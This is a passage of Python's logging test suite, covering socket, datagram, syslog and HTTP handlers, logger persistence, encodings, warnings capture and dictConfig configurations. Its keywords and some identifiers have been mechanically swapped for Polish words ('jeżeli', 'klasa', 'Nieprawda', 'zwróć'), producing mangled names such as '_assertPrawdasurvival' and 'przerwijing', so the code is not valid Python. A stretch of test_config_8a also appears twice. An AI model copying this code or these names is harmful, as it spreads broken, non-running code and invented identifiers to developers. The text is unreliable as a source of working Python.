compiler oraz compiler.xyz oraz this # was preventing compiler.xyz z being included # w the child loggers of compiler because of an # overzealous loop termination condition. hyphenated = logging.getLogger('compiler-hyphenated') # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ('CRITICAL', '3'), ], stream=output) # Original logger output jest empty. 
self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config7) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) # Will nie appear hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '4'), ('ERROR', '5'), ('INFO', '6'), ('ERROR', '7'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_logger_disabling(self): self.apply_config(self.disable_test) logger = logging.getLogger('some_pristine_logger') self.assertNieprawda(logger.disabled) self.apply_config(self.disable_test) self.assertPrawda(logger.disabled) self.apply_config(self.disable_test, disable_existing_loggers=Nieprawda) self.assertNieprawda(logger.disabled) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SocketHandlerTest(BaseTest): """Test dla SocketHandler objects.""" jeżeli threading: server_class = TestTCPServer address = ('localhost', 0) def setUp(self): """Set up a TCP server to receive log messages, oraz a SocketHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_socket, 0.01) server.start() server.ready.wait() hcls = logging.handlers.SocketHandler jeżeli isinstance(server.server_address, tuple): self.sock_hdlr = hcls('localhost', server.port) inaczej: self.sock_hdlr = hcls(server.server_address, Nic) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sock_hdlr) self.handled = threading.Semaphore(0) def tearDown(self): """Shutdown the TCP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sock_hdlr) self.sock_hdlr.close() w_końcu: 
BaseTest.tearDown(self) def handle_socket(self, request): conn = request.connection dopóki Prawda: chunk = conn.recv(4) jeżeli len(chunk) < 4: przerwij slen = struct.unpack(">L", chunk)[0] chunk = conn.recv(slen) dopóki len(chunk) < slen: chunk = chunk + conn.recv(slen - len(chunk)) obj = pickle.loads(chunk) record = logging.makeLogRecord(obj) self.log_output += record.msg + '\n' self.handled.release() def test_output(self): # The log message sent to the SocketHandler jest properly received. logger = logging.getLogger("tcp") logger.error("spam") self.handled.acquire() logger.debug("eggs") self.handled.acquire() self.assertEqual(self.log_output, "spam\neggs\n") def test_noserver(self): # Avoid timing-related failures due to SocketHandler's own hard-wired # one-second timeout on socket.create_connection() (issue #16264). self.sock_hdlr.retryStart = 2.5 # Kill the server self.server.stop(2.0) # The logging call should try to connect, which should fail spróbuj: podnieś RuntimeError('Deliberate mistake') wyjąwszy RuntimeError: self.root_logger.exception('Never sent') self.root_logger.error('Never sent, either') now = time.time() self.assertGreater(self.sock_hdlr.retryTime, now) time.sleep(self.sock_hdlr.retryTime - now + 0.001) self.root_logger.error('Nor this') def _get_temp_domain_socket(): fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock') os.close(fd) # just need a name - file can't be present, albo we'll get an # 'address already w use' error. 
os.remove(fn) zwróć fn @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixSocketHandlerTest(SocketHandlerTest): """Test dla SocketHandler przy unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixStreamServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() SocketHandlerTest.setUp(self) def tearDown(self): SocketHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa DatagramHandlerTest(BaseTest): """Test dla DatagramHandler.""" jeżeli threading: server_class = TestUDPServer address = ('localhost', 0) def setUp(self): """Set up a UDP server to receive log messages, oraz a DatagramHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_datagram, 0.01) server.start() server.ready.wait() hcls = logging.handlers.DatagramHandler jeżeli isinstance(server.server_address, tuple): self.sock_hdlr = hcls('localhost', server.port) inaczej: self.sock_hdlr = hcls(server.server_address, Nic) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sock_hdlr) self.handled = threading.Event() def tearDown(self): """Shutdown the UDP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sock_hdlr) self.sock_hdlr.close() w_końcu: BaseTest.tearDown(self) def handle_datagram(self, request): slen = struct.pack('>L', 0) # length of prefix packet = request.packet[len(slen):] obj = pickle.loads(packet) record = logging.makeLogRecord(obj) self.log_output += record.msg + '\n' self.handled.set() def test_output(self): # The log message sent to the DatagramHandler jest properly received. 
logger = logging.getLogger("udp") logger.error("spam") self.handled.wait() self.handled.clear() logger.error("eggs") self.handled.wait() self.assertEqual(self.log_output, "spam\neggs\n") @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixDatagramHandlerTest(DatagramHandlerTest): """Test dla DatagramHandler using Unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixDatagramServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() DatagramHandlerTest.setUp(self) def tearDown(self): DatagramHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SysLogHandlerTest(BaseTest): """Test dla SysLogHandler using UDP.""" jeżeli threading: server_class = TestUDPServer address = ('localhost', 0) def setUp(self): """Set up a UDP server to receive log messages, oraz a SysLogHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_datagram, 0.01) server.start() server.ready.wait() hcls = logging.handlers.SysLogHandler jeżeli isinstance(server.server_address, tuple): self.sl_hdlr = hcls(('localhost', server.port)) inaczej: self.sl_hdlr = hcls(server.server_address) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sl_hdlr) self.handled = threading.Event() def tearDown(self): """Shutdown the UDP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sl_hdlr) self.sl_hdlr.close() w_końcu: BaseTest.tearDown(self) def handle_datagram(self, request): self.log_output = request.packet self.handled.set() def test_output(self): # The log message sent to the SysLogHandler jest properly received. 
logger = logging.getLogger("slh") logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00') self.handled.clear() self.sl_hdlr.append_nul = Nieprawda logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m') self.handled.clear() self.sl_hdlr.ident = "h\xe4m-" logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m') @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixSysLogHandlerTest(SysLogHandlerTest): """Test dla SysLogHandler przy Unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixDatagramServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() SysLogHandlerTest.setUp(self) def tearDown(self): SysLogHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa HTTPHandlerTest(BaseTest): """Test dla HTTPHandler.""" def setUp(self): """Set up an HTTP server to receive log messages, oraz a HTTPHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.handled = threading.Event() def handle_request(self, request): self.command = request.command self.log_data = urlparse(request.path) jeżeli self.command == 'POST': spróbuj: rlen = int(request.headers['Content-Length']) self.post_data = request.rfile.read(rlen) wyjąwszy: self.post_data = Nic request.send_response(200) request.end_headers() self.handled.set() def test_output(self): # The log message sent to the HTTPHandler jest properly received. 
logger = logging.getLogger("http") root_logger = self.root_logger root_logger.removeHandler(self.root_logger.handlers[0]) dla secure w (Nieprawda, Prawda): addr = ('localhost', 0) jeżeli secure: spróbuj: zaimportuj ssl wyjąwszy ImportError: sslctx = Nic inaczej: here = os.path.dirname(__file__) localhost_cert = os.path.join(here, "keycert.pem") sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) sslctx.load_cert_chain(localhost_cert) context = ssl.create_default_context(cafile=localhost_cert) inaczej: sslctx = Nic context = Nic self.server = server = TestHTTPServer(addr, self.handle_request, 0.01, sslctx=sslctx) server.start() server.ready.wait() host = 'localhost:%d' % server.server_port secure_client = secure oraz sslctx self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob', secure=secure_client, context=context) self.log_data = Nic root_logger.addHandler(self.h_hdlr) dla method w ('GET', 'POST'): self.h_hdlr.method = method self.handled.clear() msg = "sp\xe4m" logger.error(msg) self.handled.wait() self.assertEqual(self.log_data.path, '/frob') self.assertEqual(self.command, method) jeżeli method == 'GET': d = parse_qs(self.log_data.query) inaczej: d = parse_qs(self.post_data.decode('utf-8')) self.assertEqual(d['name'], ['http']) self.assertEqual(d['funcName'], ['test_output']) self.assertEqual(d['msg'], [msg]) self.server.stop(2.0) self.root_logger.removeHandler(self.h_hdlr) self.h_hdlr.close() klasa MemoryTest(BaseTest): """Test memory persistence of logger objects.""" def setUp(self): """Create a dict to remember potentially destroyed objects.""" BaseTest.setUp(self) self._survivors = {} def _watch_for_survival(self, *args): """Watch the given objects dla survival, by creating weakrefs to them.""" dla obj w args: key = id(obj), repr(obj) self._survivors[key] = weakref.ref(obj) def _assertPrawdasurvival(self): """Assert that all objects watched dla survival have survived.""" # Trigger cycle przerwijing. 
gc.collect() dead = [] dla (id_, repr_), ref w self._survivors.items(): jeżeli ref() jest Nic: dead.append(repr_) jeżeli dead: self.fail("%d objects should have survived " "but have been destroyed: %s" % (len(dead), ", ".join(dead))) def test_persistent_loggers(self): # Logger objects are persistent oraz retain their configuration, even # jeżeli visible references are destroyed. self.root_logger.setLevel(logging.INFO) foo = logging.getLogger("foo") self._watch_for_survival(foo) foo.setLevel(logging.DEBUG) self.root_logger.debug(self.next_message()) foo.debug(self.next_message()) self.assert_log_lines([ ('foo', 'DEBUG', '2'), ]) usuń foo # foo has survived. self._assertPrawdasurvival() # foo has retained its settings. bar = logging.getLogger("foo") bar.debug(self.next_message()) self.assert_log_lines([ ('foo', 'DEBUG', '2'), ('foo', 'DEBUG', '3'), ]) klasa EncodingTest(BaseTest): def test_encoding_plain_file(self): # In Python 2.x, a plain file object jest treated jako having no encoding. log = logging.getLogger("test") fd, fn = tempfile.mkstemp(".log", "test_logging-1-") os.close(fd) # the non-ascii data we write to the log. data = "foo\x80" spróbuj: handler = logging.FileHandler(fn, encoding="utf-8") log.addHandler(handler) spróbuj: # write non-ascii data to the log. 
log.warning(data) w_końcu: log.removeHandler(handler) handler.close() # check we wrote exactly those bytes, ignoring trailing \n etc f = open(fn, encoding="utf-8") spróbuj: self.assertEqual(f.read().rstrip(), data) w_końcu: f.close() w_końcu: jeżeli os.path.isfile(fn): os.remove(fn) def test_encoding_cyrillic_unicode(self): log = logging.getLogger("test") #Get a message w Unicode: Do svidanya w Cyrillic (meaning goodbye) message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f' #Ensure it's written w a Cyrillic encoding writer_class = codecs.getwriter('cp1251') writer_class.encoding = 'cp1251' stream = io.BytesIO() writer = writer_class(stream, 'strict') handler = logging.StreamHandler(writer) log.addHandler(handler) spróbuj: log.warning(message) w_końcu: log.removeHandler(handler) handler.close() # check we wrote exactly those bytes, ignoring trailing \n etc s = stream.getvalue() #Compare against what the data should be when encoded w CP-1251 self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n') klasa WarningsTest(BaseTest): def test_warnings(self): przy warnings.catch_warnings(): logging.captureWarnings(Prawda) self.addCleanup(logging.captureWarnings, Nieprawda) warnings.filterwarnings("always", category=UserWarning) stream = io.StringIO() h = logging.StreamHandler(stream) logger = logging.getLogger("py.warnings") logger.addHandler(h) warnings.warn("I'm warning you...") logger.removeHandler(h) s = stream.getvalue() h.close() self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0) #See jeżeli an explicit file uses the original implementation a_file = io.StringIO() warnings.showwarning("Explicit", UserWarning, "dummy.py", 42, a_file, "Dummy line") s = a_file.getvalue() a_file.close() self.assertEqual(s, "dummy.py:42: UserWarning: Explicit\n Dummy line\n") def test_warnings_no_handlers(self): przy warnings.catch_warnings(): logging.captureWarnings(Prawda) self.addCleanup(logging.captureWarnings, Nieprawda) # confirm our 
assumption: no loggers are set logger = logging.getLogger("py.warnings") self.assertEqual(logger.handlers, []) warnings.showwarning("Explicit", UserWarning, "dummy.py", 42) self.assertEqual(len(logger.handlers), 1) self.assertIsInstance(logger.handlers[0], logging.NullHandler) def formatFunc(format, datefmt=Nic): zwróć logging.Formatter(format, datefmt) def handlerFunc(): zwróć logging.StreamHandler() klasa CustomHandler(logging.StreamHandler): dalej klasa ConfigDictTest(BaseTest): """Reading logging config z a dictionary.""" expected_log_pat = r"^(\w+) \+\+ (\w+)$" # config0 jest a standard configuration. config0 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } # config1 adds a little to the standard configuration. config1 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config1a moves the handler to the root. 
Used przy config8a config1a = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } # config2 has a subtle configuration error that should be reported config2 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdbout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config1 but przy a misspelt level on a handler config2a = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NTOSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config1 but przy a misspelt level on a logger config2b = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WRANING', }, } # config3 has a less subtle configuration error config3 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'misspelled_name', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 
'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config4 specifies a custom formatter klasa to be loaded config4 = { 'version': 1, 'formatters': { 'form1' : { '()' : __name__ + '.ExceptionFormatter', 'format' : '%(levelname)s:%(name)s:%(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'root' : { 'level' : 'NOTSET', 'handlers' : ['hand1'], }, } # As config4 but using an actual callable rather than a string config4a = { 'version': 1, 'formatters': { 'form1' : { '()' : ExceptionFormatter, 'format' : '%(levelname)s:%(name)s:%(message)s', }, 'form2' : { '()' : __name__ + '.formatFunc', 'format' : '%(levelname)s:%(name)s:%(message)s', }, 'form3' : { '()' : formatFunc, 'format' : '%(levelname)s:%(name)s:%(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, 'hand2' : { '()' : handlerFunc, }, }, 'root' : { 'level' : 'NOTSET', 'handlers' : ['hand1'], }, } # config5 specifies a custom handler klasa to be loaded config5 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : __name__ + '.CustomHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config6 specifies a custom handler klasa to be loaded # but has bad arguments config6 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : __name__ + '.CustomHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', '9' : 'invalid parameter name', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 
'level' : 'WARNING', }, } #config 7 does nie define compiler.parser but defines compiler.lexer #so compiler.parser should be disabled after applying it config7 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.lexer' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config8 defines both compiler oraz compiler.lexer # so compiler.parser should nie be disabled (since # compiler jest defined) config8 = { 'version': 1, 'disable_existing_loggers' : Nieprawda, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, 'compiler.lexer' : { }, }, 'root' : { 'level' : 'WARNING', }, } # config8a disables existing loggers config8a = { 'version': 1, 'disable_existing_loggers' : Prawda, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, 'compiler.lexer' : { }, }, 'root' : { 'level' : 'WARNING', }, } config9 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'WARNING', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'NOTSET', }, } config9a = { 'version': 1, 'incremental' : Prawda, 'handlers' : { 'hand1' : { 'level' : 'WARNING', }, 
}, 'loggers' : { 'compiler.parser' : { 'level' : 'INFO', }, }, } config9b = { 'version': 1, 'incremental' : Prawda, 'handlers' : { 'hand1' : { 'level' : 'INFO', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'INFO', }, }, } #As config1 but przy a filter added config10 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'filters' : { 'filt1' : { 'name' : 'compiler.parser', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', 'filters' : ['filt1'], }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'filters' : ['filt1'], }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } #As config1 but using cfg:// references config11 = { 'version': 1, 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config11 but missing the version key config12 = { 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config11 but using an unsupported version config13 = { 'version': 2, 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' 
: 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # As config0, but przy properties config14 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', '.': { 'foo': 'bar', 'terminator': '!\n', } }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } out_of_order = { "version": 1, "formatters": { "mySimpleFormatter": { "format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s", "style": "$" } }, "handlers": { "fileGlobal": { "class": "logging.StreamHandler", "level": "DEBUG", "formatter": "mySimpleFormatter" }, "bufferGlobal": { "class": "logging.handlers.MemoryHandler", "capacity": 5, "formatter": "mySimpleFormatter", "target": "fileGlobal", "level": "DEBUG" } }, "loggers": { "mymodule": { "level": "DEBUG", "handlers": ["bufferGlobal"], "propagate": "true" } } } def apply_config(self, conf): logging.config.dictConfig(conf) def test_config0_ok(self): # A simple config which overrides the default settings. przy support.captured_stdout() jako output: self.apply_config(self.config0) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config1_ok(self, config=config1): # A config defining a sub-parser jako well. 
przy support.captured_stdout() jako output: self.apply_config(config) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config2_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2) def test_config2a_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2a) def test_config2b_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2b) def test_config3_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config3) def test_config4_ok(self): # A config specifying a custom formatter class. przy support.captured_stdout() jako output: self.apply_config(self.config4) #logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config4a_ok(self): # A config specifying a custom formatter class. 
przy support.captured_stdout() jako output: self.apply_config(self.config4a) #logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config5_ok(self): self.test_config1_ok(config=self.config5) def test_config6_failure(self): self.assertRaises(Exception, self.apply_config, self.config6) def test_config7_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config7) logger = logging.getLogger("compiler.parser") self.assertPrawda(logger.disabled) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) #Same jako test_config_7_ok but don't disable old loggers. def test_config_8_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1) logger = logging.getLogger("compiler.parser") # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. 
self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config8) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ('INFO', '5'), ('ERROR', '6'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config_8a_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1a) logger = logging.getLogger("compiler.parser") # See issue #11424. compiler-hyphenated sorts # between compiler oraz compiler.xyz oraz this # was preventing compiler.xyz z being included # w the child loggers of compiler because of an # overzealous loop termination condition. hyphenated = logging.getLogger('compiler-hyphenated') # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ('CRITICAL', '3'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config8a) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) # Will nie appear hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '4'), ('ERROR', '5'), ('INFO', '6'), ('ERROR', '7'), ], stream=output) # Original logger output jest empty. 
self.assert_log_lines([]) def test_config_9_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config9) logger = logging.getLogger("compiler.parser") #Nothing will be output since both handler oraz logger are set to WARNING logger.info(self.next_message()) self.assert_log_lines([], stream=output) self.apply_config(self.config9a) #Nothing will be output since both handler jest still set to WARNING logger.info(self.next_message()) self.assert_log_lines([], stream=output) self.apply_config(self.config9b) #Message should now be output logger.info(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ], stream=output) def test_config_10_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config10) logger = logging.getLogger("compiler.parser") logger.warning(self.next_message()) logger = logging.getLogger('compiler') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger('compiler.lexer') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger("compiler.parser.codegen") #Output, jako nie filtered logger.error(self.next_message()) self.assert_log_lines([ ('WARNING', '1'), ('ERROR', '4'), ], stream=output) def test_config11_ok(self): self.test_config1_ok(self.config11) def test_config12_failure(self): self.assertRaises(Exception, self.apply_config, self.config12) def test_config13_failure(self): self.assertRaises(Exception, self.apply_config, self.config13) def test_config14_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config14) h = logging._handlers['hand1'] self.assertEqual(h.foo, 'bar') self.assertEqual(h.terminator, '!\n') logging.warning('Exclamation') self.assertPrawda(output.getvalue().endswith('Exclamation!\n')) @unittest.skipUnless(threading, 'listen() needs threading to work') def setup_via_listener(self, text, verify=Nic): text = text.encode("utf-8") # Ask dla a randomly assigned port (by using port 
